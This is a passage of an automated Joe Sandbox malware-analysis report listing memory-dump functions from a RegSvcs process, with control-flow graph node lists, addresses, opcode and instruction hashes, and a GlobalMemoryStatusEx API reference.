2465->2469 2467->2436 2475 66b7f79-66b7f95 2467->2475 2468->2459 2469->2444 2494 66b820c-66b8216 2469->2494 2473->2445 2481 66b82a6-66b82c3 2474->2481 2482 66b8405-66b8414 2474->2482 2483 66b7f9b-66b7fc5 2475->2483 2484 66b80fa-66b8106 2475->2484 2481->2482 2495 66b82c9-66b83bf call 66b6670 2481->2495 2482->2473 2482->2474 2498 66b7fcb-66b7ff3 2483->2498 2499 66b80f0-66b80f5 2483->2499 2484->2446 2484->2467 2547 66b83cd 2495->2547 2548 66b83c1-66b83cb 2495->2548 2498->2499 2505 66b7ff9-66b8027 2498->2505 2499->2484 2505->2499 2511 66b802d-66b8036 2505->2511 2511->2499 2512 66b803c-66b806e 2511->2512 2520 66b8079-66b8095 2512->2520 2521 66b8070-66b8074 2512->2521 2520->2484 2522 66b8097-66b80ee call 66b6670 2520->2522 2521->2499 2523 66b8076 2521->2523 2522->2484 2523->2520 2549 66b83d2-66b83d4 2547->2549 2548->2549 2549->2482 2550 66b83d6-66b83db 2549->2550 2551 66b83e9 2550->2551 2552 66b83dd-66b83e7 2550->2552 2553 66b83ee-66b83f0 2551->2553 2552->2553 2553->2482 2554 66b83f2-66b83fe 2553->2554 2554->2482
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 69bbb73b918ab1a280419c66f46500c66d75d1957e2059ea2ba8dc54f418e2ed
                                                          • Instruction ID: 9543c0d577b662c92a13fa1d8f92753da9099a6748065e7c8e57e41be05320e8
                                                          • Opcode Fuzzy Hash: 69bbb73b918ab1a280419c66f46500c66d75d1957e2059ea2ba8dc54f418e2ed
                                                          • Instruction Fuzzy Hash: 62029C30B0021ADFDB58DF68D950BAEB7A6FF84314F149529D4169B394DB36ED82CB80
                                                          Function 02B7EC28 Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 180 2b7ec28-2b7ec43 181 2b7ec45-2b7ec6c 180->181 182 2b7ec6d-2b7ec8c call 2b7e3a0 180->182 187 2b7ec92-2b7ecf1 182->187 188 2b7ec8e-2b7ec91 182->188 195 2b7ecf7-2b7ed84 GlobalMemoryStatusEx 187->195 196 2b7ecf3-2b7ecf6 187->196 200 2b7ed86-2b7ed8c 195->200 201 2b7ed8d-2b7edb5 195->201 200->201
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3874035352.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_2b70000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 538178d5a41d3a2aeae96bddac044365a7fd14037062a4ad2e0855364b42b626
                                                          • Instruction ID: 5a18a8d6507b94a0d6f4994e2c43eee944e7a052e35b9fb66719da1d4765932e
                                                          • Opcode Fuzzy Hash: 538178d5a41d3a2aeae96bddac044365a7fd14037062a4ad2e0855364b42b626
                                                          • Instruction Fuzzy Hash: D4411572D047999FC715CFB9D8007AEBFF5EF89210F1585AAE414A7240DB749884CBE1
                                                          Function 02B7ED10 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 204 2b7ed10-2b7ed4e 205 2b7ed56-2b7ed84 GlobalMemoryStatusEx 204->205 206 2b7ed86-2b7ed8c 205->206 207 2b7ed8d-2b7edb5 205->207 206->207
                                                          APIs
                                                          • GlobalMemoryStatusEx.KERNEL32 ref: 02B7ED77
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3874035352.0000000002B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_2b70000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID: GlobalMemoryStatus
                                                          • String ID:
                                                          • API String ID: 1890195054-0
                                                          • Opcode ID: bfdee2ac2dee90de45e76bf944777627b513612c90773a324641cf7c8d68e4d6
                                                          • Instruction ID: 6e78216f66c4fca79ebf692ed380838f7c30dd3d3f0b1189e65ed9c1037a8c50
                                                          • Opcode Fuzzy Hash: bfdee2ac2dee90de45e76bf944777627b513612c90773a324641cf7c8d68e4d6
                                                          • Instruction Fuzzy Hash: AB11E2B2C00659DBDB10DFAAD844B9EFBF4AF48324F15816AD818B7240D378A945CFA5
                                                          Function 066BD000 Relevance: .8, Instructions: 798COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1022 66bd000-66bd01b 1023 66bd01d-66bd020 1022->1023 1024 66bd069-66bd06c 1023->1024 1025 66bd022-66bd064 1023->1025 1026 66bd06e-66bd0b0 1024->1026 1027 66bd0b5-66bd0b8 1024->1027 1025->1024 1026->1027 1029 66bd0ba-66bd0bc 1027->1029 1030 66bd0c7-66bd0ca 1027->1030 1032 66bd0c2 1029->1032 1033 66bd3a7-66bd3b0 1029->1033 1034 66bd0ed-66bd0f0 1030->1034 1035 66bd0cc-66bd0e8 1030->1035 1032->1030 1039 66bd3bf-66bd3cb 1033->1039 1040 66bd3b2-66bd3b7 1033->1040 1036 66bd10d-66bd110 1034->1036 1037 66bd0f2-66bd108 1034->1037 1035->1034 1042 66bd159-66bd15c 1036->1042 1043 66bd112-66bd121 1036->1043 1037->1036 1044 66bd4dc-66bd4e1 1039->1044 1045 66bd3d1-66bd3e5 1039->1045 1040->1039 1047 66bd15e-66bd16d 1042->1047 1048 66bd1a5-66bd1a8 1042->1048 1051 66bd123-66bd128 1043->1051 1052 66bd130-66bd13c 1043->1052 1068 66bd4e9 1044->1068 1067 66bd3eb-66bd3fd 1045->1067 1045->1068 1054 66bd16f-66bd174 1047->1054 1055 66bd17c-66bd188 1047->1055 1057 66bd1aa-66bd1ec 1048->1057 1058 66bd1f1-66bd1f4 1048->1058 1051->1052 1060 66bda1d-66bda56 1052->1060 1061 66bd142-66bd154 1052->1061 1054->1055 1055->1060 1069 66bd18e-66bd1a0 1055->1069 1057->1058 1063 66bd23d-66bd240 1058->1063 1064 66bd1f6-66bd238 1058->1064 1084 66bda58-66bda5b 1060->1084 1061->1042 1071 66bd289-66bd28c 1063->1071 1072 66bd242-66bd284 1063->1072 1064->1063 1088 66bd3ff-66bd405 1067->1088 1089 66bd421-66bd423 1067->1089 1075 66bd4ec-66bd4f8 1068->1075 1069->1048 1081 66bd28e-66bd2d0 1071->1081 1082 66bd2d5-66bd2d8 1071->1082 1072->1071 1075->1047 1083 66bd4fe-66bd7eb 1075->1083 1081->1082 1085 66bd2da-66bd31c 1082->1085 1086 66bd321-66bd324 1082->1086 1234 66bda12-66bda1c 1083->1234 1235 66bd7f1-66bd7f7 1083->1235 1092 66bda7e-66bda81 1084->1092 1093 66bda5d-66bda79 1084->1093 1085->1086 1100 66bd32e-66bd331 1086->1100 1101 66bd326-66bd32b 1086->1101 1098 66bd409-66bd415 1088->1098 1099 66bd407 1088->1099 1111 66bd42d-66bd439 1089->1111 1095 66bda83 call 66bdb75 1092->1095 1096 66bda90-66bda93 1092->1096 1093->1092 1115 66bda89-66bda8b 1095->1115 1104 66bdac6-66bdac8 1096->1104 1105 66bda95-66bdac1 1096->1105 1108 66bd417-66bd41f 1098->1108 1099->1108 1109 66bd333-66bd335 1100->1109 1110 66bd340-66bd343 1100->1110 1101->1100 1116 66bdaca 1104->1116 1117 66bdacf-66bdad2 1104->1117 1105->1104 1108->1111 1109->1068 1120 66bd33b 1109->1120 1121 66bd38c-66bd38f 1110->1121 1122 66bd345-66bd387 1110->1122 1131 66bd43b-66bd445 1111->1131 1132 66bd447 1111->1132 1115->1096 1116->1117 1117->1084 1126 66bdad4-66bdae3 1117->1126 1120->1110 1121->1075 1125 66bd395-66bd397 1121->1125 1122->1121 1135 66bd399 1125->1135 1136 66bd39e-66bd3a1 1125->1136 1148 66bdb4a-66bdb5f 1126->1148 1149 66bdae5-66bdb48 call 66b6670 1126->1149 1139 66bd44c-66bd44e 1131->1139 1132->1139 1135->1136 1136->1023 1136->1033 1139->1068 1144 66bd454-66bd470 call 66b6670 1139->1144 1166 66bd47f-66bd48b 1144->1166 1167 66bd472-66bd477 1144->1167 1149->1148 1166->1044 1169 66bd48d-66bd4da 1166->1169 1167->1166 1169->1068 1236 66bd7f9-66bd7fe 1235->1236 1237 66bd806-66bd80f 1235->1237 1236->1237 1237->1060 1238 66bd815-66bd828 1237->1238 1240 66bd82e-66bd834 1238->1240 1241 66bda02-66bda0c 1238->1241 1242 66bd843-66bd84c 1240->1242 1243 66bd836-66bd83b 1240->1243 1241->1234 1241->1235 1242->1060 1244 66bd852-66bd873 1242->1244 1243->1242 1247 66bd882-66bd88b 1244->1247 1248 66bd875-66bd87a 1244->1248 1247->1060 1249 66bd891-66bd8ae 1247->1249 1248->1247 1249->1241 1252 66bd8b4-66bd8ba 1249->1252 1252->1060 1253 66bd8c0-66bd8d9 1252->1253 1255 66bd8df-66bd906 1253->1255 1256 66bd9f5-66bd9fc 1253->1256 1255->1060 1259 66bd90c-66bd916 1255->1259 1256->1241 1256->1252 1259->1060 1260 66bd91c-66bd933 1259->1260 1262 66bd942-66bd95d 1260->1262 1263 66bd935-66bd940 1260->1263 1262->1256 1268 66bd963-66bd97c call 66b6670 1262->1268 1263->1262 1272 66bd98b-66bd994 1268->1272 1273 66bd97e-66bd983 1268->1273 1272->1060 1274 66bd99a-66bd9ee 1272->1274 1273->1272 1274->1256
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e3f47958b9e93a71b577a66efd0c88cfb1651a48240a779740799f34af5188a0
                                                          • Instruction ID: f1ef52b3c9cd6631385babf5c12a6ff701ba68e8daba25e870b19855528ff25b
                                                          • Opcode Fuzzy Hash: e3f47958b9e93a71b577a66efd0c88cfb1651a48240a779740799f34af5188a0
                                                          • Instruction Fuzzy Hash: BE626230A0030ACFDB55EF68D690A9EB7B2FF84714B148969D0159F759EB31ED46CB80
                                                          Function 066BB700 Relevance: .5, Instructions: 472COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2556 66bb700-66bb720 2557 66bb722-66bb725 2556->2557 2558 66bb738-66bb73b 2557->2558 2559 66bb727-66bb733 2557->2559 2560 66bb74d-66bb750 2558->2560 2561 66bb73d 2558->2561 2559->2558 2563 66bb752-66bb75b 2560->2563 2564 66bb760-66bb763 2560->2564 2567 66bb745-66bb748 2561->2567 2563->2564 2565 66bb76b-66bb76e 2564->2565 2566 66bb765-66bb766 2564->2566 2568 66bb788-66bb78b 2565->2568 2569 66bb770-66bb777 2565->2569 2566->2565 2567->2560 2572 66bb78d-66bb790 2568->2572 2573 66bb7a2-66bb7a5 2568->2573 2570 66bb77d-66bb783 2569->2570 2571 66bbaa1-66bbad6 2569->2571 2570->2568 2580 66bbad8-66bbadb 2571->2580 2572->2571 2574 66bb796-66bb79d 2572->2574 2575 66bb7a7-66bb7bc 2573->2575 2576 66bb7e4-66bb7e7 2573->2576 2574->2573 2575->2571 2589 66bb7c2-66bb7df 2575->2589 2578 66bb7e9-66bb7ec 2576->2578 2579 66bb7f1-66bb7f4 2576->2579 2578->2579 2581 66bb81e-66bb821 2579->2581 2582 66bb7f6-66bb7fd 2579->2582 2584 66bbae1-66bbb09 2580->2584 2585 66bbd47-66bbd4a 2580->2585 2587 66bb823-66bb826 2581->2587 2588 66bb831-66bb834 2581->2588 2582->2571 2586 66bb803-66bb813 2582->2586 2629 66bbb0b-66bbb0e 2584->2629 2630 66bbb13-66bbb57 2584->2630 2590 66bbd6d-66bbd6f 2585->2590 2591 66bbd4c-66bbd68 2585->2591 2604 66bb819 2586->2604 2605 66bb8a7-66bb8ae 2586->2605 2587->2572 2592 66bb82c 2587->2592 2593 66bb84e-66bb851 2588->2593 2594 66bb836-66bb83d 2588->2594 2589->2576 2597 66bbd71 2590->2597 2598 66bbd76-66bbd79 2590->2598 2591->2590 2592->2588 2600 66bba30-66bba33 2593->2600 2601 66bb857-66bb85a 2593->2601 2594->2571 2599 66bb843-66bb849 2594->2599 2597->2598 2598->2580 2606 66bbd7f-66bbd88 2598->2606 2599->2593 2609 66bba38-66bba3b 2600->2609 2607 66bb86a-66bb86d 2601->2607 2608 66bb85c-66bb865 2601->2608 2604->2581 2605->2571 2614 66bb8b4-66bb8c4 2605->2614 2610 66bb88a-66bb88d 2607->2610 2611 66bb86f-66bb878 2607->2611 2608->2607 2609->2600 2612 66bba3d-66bba40 2609->2612 2610->2587 2618 66bb88f-66bb892 2610->2618 2611->2571 2615 66bb87e-66bb885 2611->2615 2616 66bba42-66bba4b 2612->2616 2617 66bba56-66bba59 2612->2617 2614->2600 2631 66bb8ca 2614->2631 2615->2610 2616->2611 2620 66bba51 2616->2620 2617->2600 2621 66bba5b-66bba5e 2617->2621 2618->2616 2622 66bb898-66bb89b 2618->2622 2620->2617 2625 66bba60-66bba67 2621->2625 2626 66bba84-66bba86 2621->2626 2627 66bb89d-66bb89f 2622->2627 2628 66bb8a2-66bb8a5 2622->2628 2625->2571 2632 66bba69-66bba79 2625->2632 2634 66bba88 2626->2634 2635 66bba8d-66bba90 2626->2635 2627->2628 2628->2605 2633 66bb8cf-66bb8d2 2628->2633 2629->2606 2655 66bbb5d-66bbb66 2630->2655 2656 66bbd3c-66bbd46 2630->2656 2631->2633 2632->2582 2643 66bba7f 2632->2643 2637 66bb8e2-66bb8e5 2633->2637 2638 66bb8d4-66bb8dd 2633->2638 2634->2635 2635->2557 2639 66bba96-66bbaa0 2635->2639 2641 66bb93a-66bb93d 2637->2641 2642 66bb8e7-66bb935 call 66b6670 2637->2642 2638->2637 2645 66bb93f-66bb946 2641->2645 2646 66bb951-66bb954 2641->2646 2642->2641 2643->2626 2645->2563 2647 66bb94c 2645->2647 2649 66bb961-66bb964 2646->2649 2650 66bb956-66bb95c 2646->2650 2647->2646 2653 66bb966-66bb96f 2649->2653 2654 66bb974-66bb977 2649->2654 2650->2649 2653->2654 2658 66bb979-66bb98e 2654->2658 2659 66bb9b6-66bb9b9 2654->2659 2660 66bbb6c-66bbbd8 call 66b6670 2655->2660 2661 66bbd32-66bbd37 2655->2661 2658->2571 2672 66bb994-66bb9b1 2658->2672 2662 66bb9bb-66bb9c2 2659->2662 2663 66bb9d3-66bb9d6 2659->2663 2690 66bbbde-66bbbe3 2660->2690 2691 66bbcd2-66bbce7 2660->2691 2661->2656 2662->2571 2668 66bb9c8-66bb9ce 2662->2668 2664 66bb9d8-66bb9dd 2663->2664 2665 66bb9e0-66bb9e3 2663->2665 2664->2665 2669 66bba06-66bba09 2665->2669 2670 66bb9e5-66bba01 2665->2670 2668->2663 2675 66bba2b-66bba2e 2669->2675 2676 66bba0b-66bba26 2669->2676 2670->2669 2672->2659 2675->2600 2675->2609 2676->2675 2693 66bbbff 2690->2693 2694 66bbbe5-66bbbeb 2690->2694 2691->2661 2695 66bbc01-66bbc07 2693->2695 2696 66bbbed-66bbbef 2694->2696 2697 66bbbf1-66bbbf3 2694->2697 2699 66bbc09-66bbc0f 2695->2699 2700 66bbc1c-66bbc29 2695->2700 2698 66bbbfd 2696->2698 2697->2698 2698->2695 2701 66bbcbd-66bbccc 2699->2701 2702 66bbc15 2699->2702 2707 66bbc2b-66bbc31 2700->2707 2708 66bbc41-66bbc4e 2700->2708 2701->2690 2701->2691 2702->2700 2703 66bbc50-66bbc5d 2702->2703 2704 66bbc84-66bbc91 2702->2704 2714 66bbc5f-66bbc65 2703->2714 2715 66bbc75-66bbc82 2703->2715 2716 66bbca9-66bbcb6 2704->2716 2717 66bbc93-66bbc99 2704->2717 2710 66bbc33 2707->2710 2711 66bbc35-66bbc37 2707->2711 2708->2701 2710->2708 2711->2708 2718 66bbc69-66bbc6b 2714->2718 2719 66bbc67 2714->2719 2715->2701 2716->2701 2720 66bbc9b 2717->2720 2721 66bbc9d-66bbc9f 2717->2721 2718->2715 2719->2715 2720->2716 2721->2716
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 58250cd344cdb2b77370f2851de00b14af42c4ce90b024f2a62d131c9763f08f
                                                          • Instruction ID: 63876cfe44be2afd0285b954c5dc4a7f73bcb9d5b9bf03e70c87adb4f93be0f3
                                                          • Opcode Fuzzy Hash: 58250cd344cdb2b77370f2851de00b14af42c4ce90b024f2a62d131c9763f08f
                                                          • Instruction Fuzzy Hash: 66027930E1020ADFDBA4DBA8D5906EDB7A2FB85310F24946AE415EB351DF71EC81CB91
                                                          Function 066BAD90 Relevance: .4, Instructions: 391COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: d3a303ceeb0f1f593e67c274ff86cfee87b89ae9fe4a2158a900bd84722ef3bf
                                                          • Instruction ID: 73d8f5897ac323080b4d7e7b4c94d6f4fdb86a0cffd3a8cdaf4829d8260ac0d0
                                                          • Opcode Fuzzy Hash: d3a303ceeb0f1f593e67c274ff86cfee87b89ae9fe4a2158a900bd84722ef3bf
                                                          • Instruction Fuzzy Hash: 50E16C30E1020ACFDB68DFA8D5906EEB7B2FFC5614F10952AD416AB344DB71D886CB91
                                                          Function 066B9210 Relevance: .2, Instructions: 231COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 22ea84e4fdd589d6b550d7d9a32ad2670a50640b3b14be0ce2d105c4da79e666
                                                          • Instruction ID: 0020abf997f99a0f69ea1308a46e227e00fed7d72621292ba1308a02b68b605e
                                                          • Opcode Fuzzy Hash: 22ea84e4fdd589d6b550d7d9a32ad2670a50640b3b14be0ce2d105c4da79e666
                                                          • Instruction Fuzzy Hash: 1B915D30F1020ACFDB64DB68D9507AEB3F2EFC9304F549566C909AB744EB719D828B91
                                                          Function 066B62B8 Relevance: .2, Instructions: 229COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: c0bcc944a581dc7fe1e2f27103f105bb3c3ea19243ad0b56548c4e0801f5d01d
                                                          • Instruction ID: 72cf81c20f864759ead1f24a56b13bcefe9e5ae3715b29184c40788fc5a6e9d6
                                                          • Opcode Fuzzy Hash: c0bcc944a581dc7fe1e2f27103f105bb3c3ea19243ad0b56548c4e0801f5d01d
                                                          • Instruction Fuzzy Hash: 7261F371F001218BDF549B7EC984AAEFAE7AFC4620B155439D80ADB360DEB5EC0287D1
                                                          Function 066B4378 Relevance: .2, Instructions: 226COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 26ed89e787afa37a4527572b9c76a7daa0b5b712d6b5df7ecbcefe4068d6bf04
                                                          • Instruction ID: 8a7b421a88dfc4214743e92d1ddb1dbee8ece67d328338fb2c595dc0cb447eb6
                                                          • Opcode Fuzzy Hash: 26ed89e787afa37a4527572b9c76a7daa0b5b712d6b5df7ecbcefe4068d6bf04
                                                          • Instruction Fuzzy Hash: E0813930B00209CFDF54DFA9D5547AEB7E2AB89314F149529D40AEB399EF31DC828B51
                                                          Function 066B4694 Relevance: .2, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e03d639711818d8a17acb9340fe238ecd0bc80bc8443afc9fa5054fc7c58061a
                                                          • Instruction ID: 15cd46a088c90886c27a1efe09e316161bfa621e512f7d139c5cf290f9f5a3bd
                                                          • Opcode Fuzzy Hash: e03d639711818d8a17acb9340fe238ecd0bc80bc8443afc9fa5054fc7c58061a
                                                          • Instruction Fuzzy Hash: 8E914E30E10619CBDF64DF68C850BD9B7B1FF89310F2086A9D449AB345DB71A985CF90
                                                          Function 066B46A8 Relevance: .2, Instructions: 210COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30f7794ea8cac4ab16f1ddb0c25cbeb059c8c23fc76da39ea413441bfcc307f2
                                                          • Instruction ID: 6d42d5b20db9f4e1c356f82317ac93c31a33b1f198749e73132504f21799e9e9
                                                          • Opcode Fuzzy Hash: 30f7794ea8cac4ab16f1ddb0c25cbeb059c8c23fc76da39ea413441bfcc307f2
                                                          • Instruction Fuzzy Hash: 43913C30E10219CBDF60DF68C840BD9B7B1FF89310F2085A9D549AB345DB71A985CF90
                                                          Function 066BEBC0 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e6284abc986c959f37a2ff6d93d8bf0e48f4b9d7420bab435dd78ecde9e65048
                                                          • Instruction ID: f265b68fbf613642c510f05b33d456ecea600cefae288cd1d77a4b2fb75ca19b
                                                          • Opcode Fuzzy Hash: e6284abc986c959f37a2ff6d93d8bf0e48f4b9d7420bab435dd78ecde9e65048
                                                          • Instruction Fuzzy Hash: BF711930A00209DFDB54EFA8D980AEDBBF6FF88314F149529D415AB359DB71E886CB50
                                                          Function 066BEBD0 Relevance: .2, Instructions: 201COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bf168416ce80da965fb4928636e50391d87139493a5cf9dbfc2a6176bf201998
                                                          • Instruction ID: 1eee41a44ef7e8bd468c88001af3de0615d612a50e795932ab7df1f13cc5f80d
                                                          • Opcode Fuzzy Hash: bf168416ce80da965fb4928636e50391d87139493a5cf9dbfc2a6176bf201998
                                                          • Instruction Fuzzy Hash: 3D712930A002099FDB54EFA8D980AEDBBF6FF88314F149429D415EB359DB71E886CB50
                                                          Function 066B4C40 Relevance: .2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3499b6ae4110c54dfe24e4fdc4a352b0214716345a8f6e596e73e8fefc3997e0
                                                          • Instruction ID: 81224be8f9a5293422214a61640b91484a5c0e49514e33201ce457c9d696bcc0
                                                          • Opcode Fuzzy Hash: 3499b6ae4110c54dfe24e4fdc4a352b0214716345a8f6e596e73e8fefc3997e0
                                                          • Instruction Fuzzy Hash: ED615C30F10209DFEB549FA8D8547AEBAF6FB88710F20842AD516AB399DF754C458B90
                                                          Function 066BFD30 Relevance: .2, Instructions: 175COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 30924619bc097c5a7a4877eab691ab917ec19adc444e7dcb7ab1fa8f7003231c
                                                          • Instruction ID: 0447dd4b1854791ce93be46b1af6a12debc2e0c27be58b4c258073014afccd20
                                                          • Opcode Fuzzy Hash: 30924619bc097c5a7a4877eab691ab917ec19adc444e7dcb7ab1fa8f7003231c
                                                          • Instruction Fuzzy Hash: F551D231E00105DFDB64EB78E9846EDF7B2EB89314F10887AE11ADB364DB318995CB80
                                                          Function 066B9200 Relevance: .2, Instructions: 171COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e810bfde729982b8b14f51a4bf15c1c3636b99c1e988bcb4d1e029f4499cf41f
                                                          • Instruction ID: b3e5f0a575e70871c233cc22906aed673776a0f8b96eab86b09f94357283bd3e
                                                          • Opcode Fuzzy Hash: e810bfde729982b8b14f51a4bf15c1c3636b99c1e988bcb4d1e029f4499cf41f
                                                          • Instruction Fuzzy Hash: A4516D30B10105CFDB54EB68D960BAEB3F6EBC9304F14957AD509EB358EB319C428BA1
                                                          Function 066BFADF Relevance: .2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 810c09da26572a317f891f76fe2885bd8a461302242e92200edb216dbee360a1
                                                          • Instruction ID: 3a0737a82424d4f8e148f160a60586008981cea05ce533df83ecd7d5086db167
                                                          • Opcode Fuzzy Hash: 810c09da26572a317f891f76fe2885bd8a461302242e92200edb216dbee360a1
                                                          • Instruction Fuzzy Hash: A2517230B10214CBEFA467ACED547AF365AD789714F60452AE50AC77A9CF39CCC18792
                                                          Function 066BFAF0 Relevance: .2, Instructions: 163COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 0000000F.00000002.3884657682.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_15_2_66b0000_RegSvcs.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1c3299e78035e8aa84f83c9186b995529d837c201925c94d3d949a09c69a2468
                                                          • Instruction ID: 086219a0aa076c891a11f43f070bb664312e550aca490021323e161b478d89fa
                                                          • Opcode Fuzzy Hash: 1c3299e78035e8aa84f83c9186b995529d837c201925c94d3d949a09c69a2468
                                                          • Instruction Fuzzy Hash: F3518130B10214CBEFA467ACEE547AF325AD789714F60542AE50AC77A5CF79CCC187A2
